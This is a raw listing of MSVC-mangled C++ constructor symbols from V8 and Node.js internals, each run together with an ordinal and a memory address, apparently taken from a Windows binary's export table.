                                  ??0BytecodeLivenessMap@compiler@internal@v8@@QEAA@HPEAVZone@23@@Z3320x140e9f0d0
                                  ??0BytecodeLoopAssignments@compiler@internal@v8@@QEAA@HHPEAVZone@23@@Z3330x140e9f710
                                  ??0BytecodeLoopHeader@interpreter@internal@v8@@QEAA@XZ3340x140869af0
                                  ??0BytecodeNode@interpreter@internal@v8@@AEAA@W4Bytecode@123@HW4OperandScale@123@VBytecodeSourceInfo@123@IIIII@Z3350x140871dd0
                                  ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIIIVBytecodeSourceInfo@123@@Z3360x140871e10
                                  ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIIVBytecodeSourceInfo@123@@Z3370x1408720d0
                                  ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIVBytecodeSourceInfo@123@@Z3380x140872310
                                  ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIVBytecodeSourceInfo@123@@Z3390x1408724d0
                                  ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IVBytecodeSourceInfo@123@@Z3400x140872610
                                  ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@VBytecodeSourceInfo@123@@Z3410x1408726f0
                                  ??0BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA@PEAVZone@23@PEAVBytecodeRegisterAllocator@123@HHPEAVBytecodeWriter@0123@@Z3420x1408709f0
                                  ??0CFunction@v8@@AEAA@PEBXPEBVCFunctionInfo@1@@Z3430x140a772f0
                                  ??0CFunction@v8@@QEAA@XZ3440x1403e7f20
                                  ??0CPU@base@v8@@QEAA@XZ3450x140dc28e0
                                  ??0CachedData@ScriptCompiler@v8@@QEAA@PEBEHW4BufferPolicy@012@@Z3460x140a773d0
                                  ??0CachedData@ScriptCompiler@v8@@QEAA@XZ3470x140076a50
                                  ??0CallDescriptor@compiler@internal@v8@@QEAA@W4Kind@0123@VMachineType@23@VLinkageLocation@123@PEAV?$Signature@VLinkageLocation@compiler@internal@v8@@@23@_KV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@3@IIV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@93@PEBDI4@Z3480x140457200
                                  ??0CallInterfaceDescriptor@internal@v8@@QEAA@AEBV012@@Z3490x140457260
                                  ??0CallInterfaceDescriptor@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z3500x140457280
                                  ??0CallInterfaceDescriptor@internal@v8@@QEAA@XZ3510x1404572b0
                                  ??0CallInterfaceDescriptorData@internal@v8@@QEAA@XZ3520x1404572d0
                                  ??0CallbackScope@AsyncResource@node@@QEAA@PEAV12@@Z3530x14024c940
                                  ??0CallbackScope@node@@QEAA@PEAVEnvironment@1@V?$Local@VObject@v8@@@v8@@Uasync_context@1@@Z3540x14024b700
                                  ??0CallbackScope@node@@QEAA@PEAVIsolate@v8@@V?$Local@VObject@v8@@@3@Uasync_context@1@@Z3550x14024b780
                                  ??0Cancelable@internal@v8@@QEAA@PEAVCancelableTaskManager@12@@Z3560x14041d420
                                  ??0CancelableTask@internal@v8@@QEAA@PEAVCancelableTaskManager@12@@Z3570x1405f6690
                                  ??0CancelableTask@internal@v8@@QEAA@PEAVIsolate@12@@Z3580x1405f66e0
                                  ??0CancelableTaskManager@internal@v8@@QEAA@XZ3590x1405f6730
                                  ??0CanonicalHandleScope@internal@v8@@QEAA@PEAVIsolate@12@@Z3600x140963cd0
                                  ??0Channel@V8Inspector@v8_inspector@@QEAA@AEBV012@@Z3610x14041d460
                                  ??0Channel@V8Inspector@v8_inspector@@QEAA@XZ3620x14041d460
                                  ??0CheckpointElimination@compiler@internal@v8@@QEAA@AEBV0123@@Z3630x140e793a0
                                  ??0CheckpointElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@@Z3640x140f0c470
                                  ??0ClassScope@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@PEAVAstValueFactory@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z3650x140a51580
                                  ??0ClassScope@internal@v8@@QEAA@PEAVZone@12@PEAVScope@12@_N@Z3660x140a517f0
                                  ??0CodeAssembler@compiler@internal@v8@@QEAA@PEAVCodeAssemblerState@123@@Z3670x140076a70
                                  ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@AEBV?$ZoneVector@PEAVCodeAssemblerVariable@compiler@internal@v8@@@23@W4Type@0123@@Z3680x1409e96b0
                                  ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAVCodeAssemblerVariable@123@W4Type@0123@@Z3690x1409e96e0
                                  ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@V?$initializer_list@PEAVCodeAssemblerVariable@compiler@internal@v8@@@std@@W4Type@0123@@Z3700x1409e9710
                                  ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@W4Type@0123@@Z3710x1409e9740
                                  ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@_KPEBQEAVCodeAssemblerVariable@123@W4Type@0123@@Z3720x140e68820
                                  ??0CodeAssemblerState@compiler@internal@v8@@AEAA@PEAVIsolate@23@PEAVZone@23@PEAVCallDescriptor@123@W4Kind@Code@23@PEBDW4PoisoningMitigationLevel@23@H@Z3730x140e68a20
                                  ??0CodeAssemblerState@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@AEBVCallInterfaceDescriptor@23@W4Kind@Code@23@PEBDW4PoisoningMitigationLevel@23@H@Z3740x140e68c60
                                  ??0CodeAssemblerState@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@HW4Kind@Code@23@PEBDW4PoisoningMitigationLevel@23@H@Z3750x140e68cf0
                                  ??0CodeAssemblerVariable@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@W4MachineRepresentation@23@@Z3760x140e68d80
                                  ??0CodeAssemblerVariable@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@W4MachineRepresentation@23@PEAVNode@123@@Z3770x140e68ef0
                                  ??0CodeBuilder@Factory@internal@v8@@QEAA@PEAVIsolate@23@AEBVCodeDesc@23@W4Kind@Code@23@@Z3780x140943a10
                                  ??0CodeCommentsIterator@internal@v8@@QEAA@_KI@Z3790x1409f9e50
                                  ??0CodeEventHandler@v8@@QEAA@PEAVIsolate@1@@Z3800x140a773f0
                                  ??0CodeEventLogger@internal@v8@@QEAA@PEAVIsolate@12@@Z3810x14084a140
                                  ??0CodeGenerator@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVFrame@123@PEAVLinkage@123@PEAVInstructionSequence@123@PEAVOptimizedCompilationInfo@23@PEAVIsolate@23@V?$Optional@VOsrHelper@compiler@internal@v8@@@base@3@HPEAVJumpOptimizationInfo@23@W4PoisoningMitigationLevel@23@AEBUAssemblerOptions@23@H_K_KV?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z3820x140e46fc0
                                  ??0CodeMap@internal@v8@@QEAA@XZ3830x1406d4170
                                  ??0CodeObjectRegistry@internal@v8@@QEAA@$$QEAV012@@Z3840x14041d470
                                  ??0CodeObjectRegistry@internal@v8@@QEAA@AEBV012@@Z3850x14041d500
                                  ??0CodeObjectRegistry@internal@v8@@QEAA@XZ3860x14041d570
                                  ??0CombinedHeapObjectIterator@internal@v8@@QEAA@PEAVHeap@12@W4HeapObjectsFiltering@HeapObjectIterator@12@@Z3870x140961010
                                  ??0CommonOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z3880x140e06020
                                  ??0CommonOperatorReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z3890x140e793c0
                                  ??0CommonOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVGraph@123@PEAVJSHeapBroker@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@PEAVZone@23@@Z3900x140f0c910
                                  ??0CompactionSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@W4LocalSpaceKind@12@@Z3910x14041d5c0
                                  ??0CompilationCache@internal@v8@@AEAA@PEAVIsolate@12@@Z3920x1409f7680
                                  ??0CompilationDependencies@compiler@internal@v8@@QEAA@$$QEAV0123@@Z3930x140e79410
                                  ??0CompilationDependencies@compiler@internal@v8@@QEAA@AEBV0123@@Z3940x140e79440
                                  ??0CompilationDependencies@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVZone@23@@Z3950x140f0e880
                                  ??0CompilationJob@internal@v8@@QEAA@AEBV012@@Z3960x1405ae410
                                  ??0CompilationJob@internal@v8@@QEAA@W4State@012@@Z3970x1405ae430
                                  ??0CompilationResultResolver@wasm@internal@v8@@QEAA@AEBV0123@@Z3980x140077da0
                                  ??0CompilationResultResolver@wasm@internal@v8@@QEAA@XZ3990x140077da0
                                  ??0CompiledWasmModule@v8@@AEAA@V?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@PEBD_K@Z4000x140a77450
                                  ??0CompiledWasmModule@v8@@QEAA@$$QEAV01@@Z4010x1400773f0
                                  ??0CompiledWasmModule@v8@@QEAA@AEBV01@@Z4020x1400773f0
                                  ??0CompilerDispatcher@internal@v8@@QEAA@PEAVIsolate@12@PEAVPlatform@2@_K@Z4030x1409d5260
                                  ??0ConcurrentMarking@internal@v8@@QEAA@PEAVHeap@12@PEAVMarkingWorklistsHolder@12@PEAUWeakObjects@12@@Z4040x14095c2c0
                                  ??0ConditionVariable@base@v8@@QEAA@XZ4050x140dbf930
                                  ??0ConditionalControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z4060x14086ba10
                                  ??0Constant@compiler@internal@v8@@QEAA@H@Z4070x140dff570
                                  ??0Constant@compiler@internal@v8@@QEAA@M@Z4080x1404526a0
                                  ??0Constant@compiler@internal@v8@@QEAA@N@Z4090x1404526c0
                                  ??0Constant@compiler@internal@v8@@QEAA@PEBVStringConstantBase@23@@Z4100x1404526e0
                                  ??0Constant@compiler@internal@v8@@QEAA@V?$Handle@VHeapObject@internal@v8@@@23@_N@Z4110x140452700
                                  ??0Constant@compiler@internal@v8@@QEAA@VExternalReference@23@@Z4120x140452720
                                  ??0Constant@compiler@internal@v8@@QEAA@VRelocatablePtrConstantInfo@123@@Z4130x140dff590
                                  ??0Constant@compiler@internal@v8@@QEAA@VRpoNumber@123@@Z4140x140452740
                                  ??0Constant@compiler@internal@v8@@QEAA@_J@Z4150x140452760
                                  ??0ConstantArrayBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z4160x14086db00
                                  ??0ConstantFoldingReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z4170x140f10480
                                  ??0Contents@ArrayBuffer@v8@@AEAA@PEAX_K01W4AllocationMode@Allocator@12@P6AX010@Z0@Z4180x140a774f0
                                  ??0Contents@ArrayBuffer@v8@@QEAA@XZ4190x140076c00
                                  ??0Contents@SharedArrayBuffer@v8@@AEAA@PEAX_K01W4AllocationMode@Allocator@ArrayBuffer@2@P6AX010@Z0@Z4200x140a774f0
                                  ??0Contents@SharedArrayBuffer@v8@@QEAA@XZ4210x140076c00
                                  ??0ContextDeserializer@internal@v8@@AEAA@PEBVSnapshotData@12@@Z4220x140600790
                                  ??0ContextSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVStartupSerializer@12@USerializeInternalFieldsCallback@2@@Z4230x14060fe40
                                  ??0ControlEquivalence@compiler@internal@v8@@QEAA@$$QEAV0123@@Z4240x140fb5560
                                  ??0ControlEquivalence@compiler@internal@v8@@QEAA@AEBV0123@@Z4250x140fb55c0
                                  ??0ControlEquivalence@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z4260x140fb56a0
                                  ??0ControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@@Z4270x14086bb70
                                  ??0ControlFlowOptimizer@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@PEAVTickCounter@23@PEAVZone@23@@Z4280x140f10920
                                  ??0Counters@V8Inspector@v8_inspector@@QEAA@AEBV012@@Z4290x14041d630
                                  ??0Counters@V8Inspector@v8_inspector@@QEAA@PEAVIsolate@v8@@@Z4300x1404def80
                                  ??0Coverage@debug@v8@@AEAA@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z4310x1403e7ef0
                                  ??0Coverage@debug@v8@@QEAA@$$QEAV012@@Z4320x1403e7ef0
                                  ??0CpuFeatureScope@internal@v8@@QEAA@PEAVAssemblerBase@12@W4CpuFeature@12@W4CheckPolicy@012@@Z4330x1400769f0
                                  ??0CpuProfile@internal@v8@@QEAA@PEAVCpuProfiler@12@PEBDVCpuProfilingOptions@2@@Z4340x1406d41e0
                                  ??0CpuProfileDeoptInfo@v8@@QEAA@$$QEAU01@@Z4350x140077b40
                                  ??0CpuProfileDeoptInfo@v8@@QEAA@AEBU01@@Z4360x140077ab0
                                  ??0CpuProfileDeoptInfo@v8@@QEAA@XZ4370x140077a30
                                  ??0CpuProfiler@internal@v8@@QEAA@PEAVIsolate@12@W4CpuProfilingNamingMode@2@W4CpuProfilingLoggingMode@2@@Z4380x1406e66a0
                                  ??0CpuProfiler@internal@v8@@QEAA@PEAVIsolate@12@W4CpuProfilingNamingMode@2@W4CpuProfilingLoggingMode@2@PEAVCpuProfilesCollection@12@PEAVProfileGenerator@12@PEAVProfilerEventsProcessor@12@@Z4390x1406e6720
                                  ??0CpuProfilesCollection@internal@v8@@QEAA@PEAVIsolate@12@@Z4400x1406d44b0
                                  ??0CpuProfilingOptions@v8@@QEAA@$$QEAV01@@Z4410x140077c90
                                  ??0CpuProfilingOptions@v8@@QEAA@AEBV01@@Z4420x140077c90
                                  ??0CpuProfilingOptions@v8@@QEAA@W4CpuProfilingMode@1@IHV?$MaybeLocal@VContext@v8@@@1@@Z4430x140a77530
                                  ??0CsaLoadElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z4440x140e79540
                                  ??0DateCache@internal@v8@@QEAA@AEBV012@@Z4450x1406761b0
                                  ??0DateCache@internal@v8@@QEAA@XZ4460x1409d2ff0
                                  ??0DbgStreamBuf@internal@v8@@QEAA@AEBV012@@Z4470x1404572f0
                                  ??0DbgStreamBuf@internal@v8@@QEAA@XZ4480x1405f2600
                                  ??0DeadCodeElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVZone@23@@Z4490x140f153a0
                                  ??0Debug@internal@v8@@AEAA@PEAVIsolate@12@@Z4500x1409bdd90
                                  ??0DebugInfo@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z4510x140565330
                                  ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@PEAVAstValueFactory@12@W4REPLMode@12@@Z4520x140a51850
                                  ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@PEAVScope@12@W4ScopeType@12@W4FunctionKind@12@@Z4530x140a51960
                                  ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@W4ScopeType@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z4540x140a51a00
                                  ??0DeferredHandleScope@internal@v8@@QEAA@PEAVIsolate@12@@Z4550x140963dc0
                                  ??0DeferredHandles@internal@v8@@AEAA@PEA_KPEAVIsolate@12@@Z4560x14041d6e0
                                  ??0DeferredHandles@internal@v8@@QEAA@AEBV012@@Z4570x14041d720
                                  ??0Delegate@ValueDeserializer@v8@@QEAA@AEBV012@@Z4580x140077370
                                  ??0Delegate@ValueDeserializer@v8@@QEAA@XZ4590x140077370
                                  ??0Delegate@ValueSerializer@v8@@QEAA@AEBV012@@Z4600x140077360
                                  ??0Delegate@ValueSerializer@v8@@QEAA@XZ4610x140077360
                                  ??0Descriptor@internal@v8@@IEAA@V?$Handle@VName@internal@v8@@@12@AEBVMaybeObjectHandle@12@VPropertyDetails@12@@Z4620x140759fe0
                                  ??0Descriptor@internal@v8@@IEAA@V?$Handle@VName@internal@v8@@@12@AEBVMaybeObjectHandle@12@W4PropertyKind@12@W4PropertyAttributes@12@W4PropertyLocation@12@W4PropertyConstness@12@VRepresentation@12@H@Z4630x14075a000
                                  ??0Descriptor@internal@v8@@QEAA@XZ4640x14075a040
                                  ??0DetachableVectorBase@internal@v8@@QEAA@XZ4650x140079310
                                  ??0DiamondMatcher@compiler@internal@v8@@QEAA@PEAVNode@123@@Z4660x140ff3120
                                  ??0DisallowJavascriptExecutionScope@Isolate@v8@@QEAA@PEAV12@W4OnFailure@012@@Z4670x140a77580
                                  ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@$$QEAV0123@@Z4680x14041d7c0
                                  ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@VAddressRegion@base@3@@Z4690x14041d820
                                  ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@XZ4700x14041d930
                                  ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z4710x1403e7f30
                                  ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@AEBV01234@@Z4720x1403e7f30
                                  ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@XZ4730x1403e7f30
                                  ??0EhFrameIterator@internal@v8@@QEAA@PEBE0@Z4740x140448380
                                  ??0EhFrameWriter@internal@v8@@QEAA@PEAVZone@12@@Z4750x1409a5000
                                  ??0EmbedderGraph@v8@@QEAA@AEBV01@@Z4760x140077db0
                                  ??0EmbedderGraph@v8@@QEAA@XZ4770x140077db0
                                  ??0EmbedderHeapTracer@v8@@QEAA@AEBV01@@Z4780x140077970
                                  ??0EmbedderHeapTracer@v8@@QEAA@XZ4790x140077950
                                  ??0EmbedderStackStateScope@internal@v8@@QEAA@PEAVLocalEmbedderHeapTracer@12@W4EmbedderStackState@cppgc@@@Z4800x1408caf50
                                  ??0Entry@TypeProfile@debug@v8@@AEAA@PEBUTypeProfileEntry@internal@3@V?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z4810x14041d360
                                  ??0Entry@TypeProfile@debug@v8@@QEAA@$$QEAV0123@@Z4820x14041d390
                                  ??0EphemeronHashTable@internal@v8@@IEAA@_K@Z4830x140076a70
                                  ??0EphemeronHashTable@internal@v8@@QEAA@XZ4840x1400cbb20
                                  ??0ErrorThrower@wasm@internal@v8@@QEAA@$$QEAV0123@@Z4850x14051b570
                                  ??0ErrorThrower@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBD@Z4860x1405159e0
                                  ??0EscapableHandleScope@v8@@QEAA@PEAVIsolate@1@@Z4870x140a77650
                                  ??0EscapeAnalysis@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVTickCounter@23@PEAVZone@23@@Z4880x140f357e0
                                  ??0EscapeAnalysisReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@VEscapeAnalysisResult@123@PEAVZone@23@@Z4890x140f3a1e0
                                  ??0Exported@protocol@v8_inspector@@QEAA@AEBV012@@Z4900x1403e7f30
                                  ??0Exported@protocol@v8_inspector@@QEAA@XZ4910x1403e7f30
                                  ??0Extension@v8@@QEAA@PEBD0HPEAPEBDH@Z4920x140a776c0
                                  ??0ExtensionConfiguration@v8@@QEAA@HQEAPEBD@Z4930x140076ed0
                                  ??0ExtensionConfiguration@v8@@QEAA@XZ4940x140076ec0
                                  ??0ExternalOneByteStringResource@String@v8@@IEAA@XZ4950x140077390
                                  ??0ExternalResourceVisitor@v8@@QEAA@AEBV01@@Z4960x140077930
                                  ??0ExternalResourceVisitor@v8@@QEAA@XZ4970x140077930
                                  ??0ExternalSourceStream@ScriptCompiler@v8@@QEAA@AEBV012@@Z4980x140076a80
                                  ??0ExternalSourceStream@ScriptCompiler@v8@@QEAA@XZ4990x140076a80
                                  ??0ExternalStringResource@String@v8@@IEAA@XZ5000x140077390
                                  ??0ExternalStringResourceBase@String@v8@@IEAA@XZ5010x140077380
                                  ??0FeedbackNexus@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@12@VFeedbackSlot@12@@Z5020x14041d970
                                  ??0FeedbackNexus@internal@v8@@QEAA@VFeedbackVector@12@VFeedbackSlot@12@@Z5030x14041d9c0
                                  ??0FeedbackSource@compiler@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@23@VFeedbackSlot@23@@Z5040x140457470
                                  ??0FeedbackVectorSpec@internal@v8@@QEAA@$$QEAV012@@Z5050x14041da10
                                  ??0FeedbackVectorSpec@internal@v8@@QEAA@AEBV012@@Z5060x14041da50
                                  ??0FeedbackVectorSpec@internal@v8@@QEAA@PEAVZone@12@@Z5070x14041db20
                                  ??0FlatStringReader@internal@v8@@QEAA@$$QEAV012@@Z5080x14041dbd0
                                  ??0FlatStringReader@internal@v8@@QEAA@AEBV012@@Z5090x14041dbd0
                                  ??0FlatStringReader@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VString@internal@v8@@@12@@Z5100x140747980
                                  ??0FlatStringReader@internal@v8@@QEAA@PEAVIsolate@12@V?$Vector@$$CBD@12@@Z5110x1407479d0
                                  ??0Frame@compiler@internal@v8@@QEAA@H@Z5120x140e45bb0
                                  ??0FrameSummary@internal@v8@@QEAA@VJavaScriptFrameSummary@012@@Z5130x140435b70
                                  ??0FrameSummary@internal@v8@@QEAA@VWasmFrameSummary@012@@Z5140x140435ba0
                                  ??0FreeListFastAlloc@internal@v8@@QEAA@XZ5150x1408cf1c0
                                  ??0FreeListLegacy@internal@v8@@QEAA@XZ5160x1408cf240
                                  ??0FreeListMany@internal@v8@@QEAA@XZ5170x1408cf2c0
                                  ??0FreeListManyCached@internal@v8@@QEAA@XZ5180x1408cf350
                                  ??0FreeListManyCachedFastPath@internal@v8@@QEAA@XZ5190x14041dc20
                                  ??0FreeListManyCachedOrigin@internal@v8@@QEAA@XZ5200x14041dc50
                                  ??0FreeListMap@internal@v8@@QEAA@XZ5210x1408cf380
                                  ??0FunctionData@Coverage@debug@v8@@AEAA@PEAUCoverageFunction@internal@3@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z5220x14041d360
                                  ??0FunctionData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z5230x14041d390
                                  ??0GCTracer@internal@v8@@QEAA@PEAVHeap@12@@Z5240x14093eb80
                                  ??0GlobalDictionary@internal@v8@@IEAA@_K@Z5250x140076a70
                                  ??0GlobalDictionary@internal@v8@@QEAA@XZ5260x1400cbb20
                                  ??0GlobalHandles@internal@v8@@QEAA@PEAVIsolate@12@@Z5270x1409646e0
                                  ??0Graph@compiler@internal@v8@@QEAA@PEAVZone@23@@Z5280x140ea5880
                                  ??0GraphAssembler@compiler@internal@v8@@QEAA@PEAVMachineGraph@123@PEAVZone@23@PEAVSchedule@123@_N@Z5290x140ec2500
                                  ??0GraphReducer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@PEAVTickCounter@23@PEAVNode@123@@Z5300x140ea17d0
                                  ??0GraphTrimmer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z5310x140f3c150
                                  ??0HandleScope@v8@@QEAA@PEAVIsolate@1@@Z5320x140a77770
                                  ??0HandlerTable@internal@v8@@QEAA@VByteArray@12@@Z5330x1409e8340
                                  ??0HandlerTable@internal@v8@@QEAA@VBytecodeArray@12@@Z5340x1409e8370
                                  ??0HandlerTable@internal@v8@@QEAA@VCode@12@@Z5350x1409e83a0
                                  ??0HandlerTable@internal@v8@@QEAA@_KHW4EncodingMode@012@@Z5360x1409e8410
                                  ??0HandlerTableBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z5370x140451f60
                                  ??0HashTableBase@internal@v8@@IEAA@_K@Z5380x140076a70
                                  ??0HashTableBase@internal@v8@@QEAA@XZ5390x1400cbb20
                                  ??0HeapCodeStatistics@v8@@QEAA@XZ5400x140079310
                                  ??0HeapConstantType@compiler@internal@v8@@AEAA@IAEBVHeapObjectRef@123@@Z5410x140e2eb10
                                  ??0HeapObjectIterator@internal@v8@@QEAA@PEAVHeap@12@W4HeapObjectsFiltering@012@@Z5420x1409274d0
                                  ??0HeapObjectStatistics@v8@@QEAA@XZ5430x140a77790
                                  ??0HeapSpaceStatistics@v8@@QEAA@XZ5440x140a777b0
                                  ??0HeapStatistics@v8@@QEAA@XZ5450x140a777d0
                                  ??0HiddenOffThreadFactory@internal@v8@@QEAA@PEAVIsolate@12@@Z5460x14041dc80
                                  ??0I32PairToBigIntDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z5470x140457390
                                  ??0I32PairToBigIntDescriptor@internal@v8@@QEAA@$$QEAV012@@Z5480x1404573c0
                                  ??0I32PairToBigIntDescriptor@internal@v8@@QEAA@AEBV012@@Z5490x1404573c0
                                  ??0I32PairToBigIntDescriptor@internal@v8@@QEAA@XZ5500x1404573e0
                                  ??0I64ToBigIntDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z5510x140457400
                                  ??0I64ToBigIntDescriptor@internal@v8@@QEAA@$$QEAV012@@Z5520x140457430
                                  ??0I64ToBigIntDescriptor@internal@v8@@QEAA@AEBV012@@Z5530x140457430
                                  ??0I64ToBigIntDescriptor@internal@v8@@QEAA@XZ5540x140457450
                                  ??0IdentityMapBase@internal@v8@@IEAA@PEAVHeap@12@@Z5550x140540da0
                                  ??0IncrementalMarking@internal@v8@@QEAA@PEAVHeap@12@PEAUWeakObjects@12@@Z5560x1409200d0
                                  ??0Inputs@Node@compiler@internal@v8@@QEAA@PEBQEAV1234@H@Z5570x140457470
                                  ??0Inspectable@V8InspectorSession@v8_inspector@@QEAA@AEBV012@@Z5580x14041dca0
                                  ??0Inspectable@V8InspectorSession@v8_inspector@@QEAA@XZ5590x14041dca0
                                  ??0InstantiationResultResolver@wasm@internal@v8@@QEAA@AEBV0123@@Z5600x140077da0
                                  ??0InstantiationResultResolver@wasm@internal@v8@@QEAA@XZ5610x140077da0
                                  ??0Instruction@compiler@internal@v8@@AEAA@I@Z5620x140dff790
                                  ??0Instruction@compiler@internal@v8@@AEAA@I_KPEAVInstructionOperand@123@0101@Z5630x140dff7b0
                                  ??0InstructionBlock@compiler@internal@v8@@QEAA@$$QEAV0123@@Z5640x140452780
                                  ??0InstructionBlock@compiler@internal@v8@@QEAA@AEBV0123@@Z5650x140452890
                                  ??0InstructionBlock@compiler@internal@v8@@QEAA@PEAVZone@23@VRpoNumber@123@11_N2@Z5660x140dff890
                                  ??0InstructionOperand@compiler@internal@v8@@IEAA@W4Kind@0123@@Z5670x1404529d0
                                  ??0InstructionOperand@compiler@internal@v8@@QEAA@XZ5680x1400cbb20
                                  ??0InstructionScheduler@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVInstructionSequence@123@@Z5690x140ea4740
                                  ??0InstructionSelector@compiler@internal@v8@@QEAA@$$QEAV0123@@Z5700x140457480
                                  ??0InstructionSelector@compiler@internal@v8@@QEAA@AEBV0123@@Z5710x140457850
                                  ??0InstructionSelector@compiler@internal@v8@@QEAA@PEAVZone@23@_KPEAVLinkage@123@PEAVInstructionSequence@123@PEAVSchedule@123@PEAVSourcePositionTable@123@PEAVFrame@123@W4EnableSwitchJumpTable@0123@PEAVTickCounter@23@PEA_K9W4SourcePositionMode@0123@VFeatures@0123@W4EnableScheduling@0123@W4EnableRootsRelativeAddressing@0123@W4PoisoningMitigationLevel@23@W4EnableTraceTurboJson@0123@@Z5720x140e33f20
                                  ??0InstructionSequence@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@PEAV?$ZoneVector@PEAVInstructionBlock@compiler@internal@v8@@@23@@Z5730x140dff900
                                  ??0Int64Lowering@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVMachineOperatorBuilder@123@PEAVCommonOperatorBuilder@123@PEAVZone@23@PEAV?$Signature@W4MachineRepresentation@internal@v8@@@23@V?$unique_ptr@UInt64LoweringSpecialCase@compiler@internal@v8@@U?$default_delete@UInt64LoweringSpecialCase@compiler@internal@v8@@@std@@@std@@@Z5740x140ed2bf0
                                  ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@$$QEAU0123@@Z5750x140419820
                                  ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@AEBU0123@@Z5760x140419900
                                  ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@XZ5770x140419990
                                  ??0InterpreterDispatchDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z5780x140457b30
                                  ??0InterpreterDispatchDescriptor@internal@v8@@QEAA@$$QEAV012@@Z5790x140457b60
                                  ??0InterpreterDispatchDescriptor@internal@v8@@QEAA@AEBV012@@Z5800x140457b60
                                  ??0InterpreterDispatchDescriptor@internal@v8@@QEAA@XZ5810x140457b80
                                  ??0InterruptsScope@internal@v8@@QEAA@PEAVIsolate@12@_JW4Mode@012@@Z5820x140986130
                                  ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@$$QEAV012@@Z5830x14041dcb0
                                  ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@AEBV012@@Z5840x14041dd40
